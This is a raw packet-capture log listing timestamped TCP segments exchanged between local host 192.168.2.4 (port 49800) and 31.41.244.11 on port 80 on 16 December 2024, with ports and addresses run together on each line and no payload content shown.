                                                                                                                                                                                              Dec 16, 2024 01:01:25.621002913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.621102095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.622030020 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.622100115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.622154951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.622209072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.623174906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.623250961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.623291969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.623344898 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.624355078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.624443054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.624445915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.624495029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.625533104 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.625596046 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.625646114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.625698090 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.626686096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.626756907 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.626811981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.626866102 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.627860069 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.627918005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.627986908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.628046036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.629025936 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.629086971 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.629149914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.629291058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.630199909 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.630268097 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.630321026 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.630372047 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.631402969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.631468058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.631483078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.631534100 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.632550001 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.632617950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.632669926 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.632766008 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.633725882 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.633795023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.633812904 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.633868933 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.634896994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.634962082 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.635001898 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.635122061 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.636056900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.636115074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.636176109 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.636229038 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.637254953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.637320995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.637355089 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.637411118 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.638428926 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.638498068 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.638547897 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.638652086 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.639574051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.639641047 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.639703035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.639841080 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.640770912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.640837908 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.640852928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.640903950 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.641943932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.642106056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.642113924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.642168999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.643053055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.643106937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.643162012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.643212080 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.644242048 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.644347906 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.644359112 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.644408941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.645401955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.645454884 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.645503044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.645687103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.646593094 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.646661043 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.646691084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.646742105 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.647746086 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.647800922 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.647850037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.647902012 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.648924112 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.649033070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.649039984 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.649080992 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.650130033 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.650188923 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.650262117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.650316000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.651257992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.651318073 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.651359081 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.651406050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.652472019 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.652529955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.652565002 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.652668953 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.653604984 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.653690100 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.653729916 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.653780937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.654778004 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.654834032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.654886961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.654983044 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.655940056 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.655992031 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.656044960 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.656146049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.657113075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.657162905 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.657211065 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.657262087 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.671942949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.671968937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.672007084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.672040939 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.672261000 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.672318935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.672331095 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.672375917 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.673399925 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.673455000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.673511028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.673612118 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.674585104 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.674635887 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.793978930 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.794004917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.794303894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.794543028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.794574022 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.794615984 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.794646978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.795773029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.795799017 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.795861959 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.796720982 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.796782017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.797138929 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.797228098 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.797288895 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.798265934 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.798332930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.798378944 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.798432112 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.799452066 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.799524069 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.799561024 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.799612999 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.800633907 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.800725937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.800729990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.800779104 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.801799059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.801852942 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.801917076 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.802088022 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.802973032 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.803025007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.803081036 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.804141045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.804204941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.804244041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.804296017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.805335045 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.805386066 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.805409908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.805455923 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.806479931 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.806554079 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.806585073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.806638002 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.807826042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.807879925 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.807928085 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.807972908 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.808850050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.808900118 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.808940887 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.808984041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.810019970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.810223103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.810278893 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.811167955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.811218977 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.811249018 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.811295033 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.812361956 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.812424898 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.812447071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.812490940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.813601017 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.813649893 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.813743114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.813788891 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.814663887 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.814719915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.814766884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.814809084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.815854073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.815928936 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.816000938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.816046000 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.817023993 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.817073107 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.817120075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.818201065 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.818249941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.818295956 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.818341017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.819351912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.819402933 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.819449902 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.819511890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.820530891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.820590019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.820636988 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.820682049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.821702957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.821805954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.821861982 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.822869062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.822920084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.822964907 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.823008060 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.824049950 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.824094057 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.824161053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.824204922 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.825217009 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.825259924 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.825308084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.825349092 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.826436996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.826550961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.826598883 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.827554941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.827598095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.827661991 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.827703953 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.828696012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.828737974 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.828891993 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.828933954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.829904079 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.829972029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.830010891 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.831087112 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.831139088 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.831187963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.831232071 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.832245111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.832287073 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.832356930 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.832398891 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.833404064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.833515882 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.833574057 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.834590912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.834644079 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.834685087 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.834831953 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.835809946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.835863113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.835890055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.835933924 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.836922884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.836977959 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.837024927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.837071896 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.838087082 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.838138103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.838169098 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.838210106 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.839272022 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.839324951 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.839421034 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.839466095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.840421915 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.840470076 CET4980080192.168.2.431.41.244.11
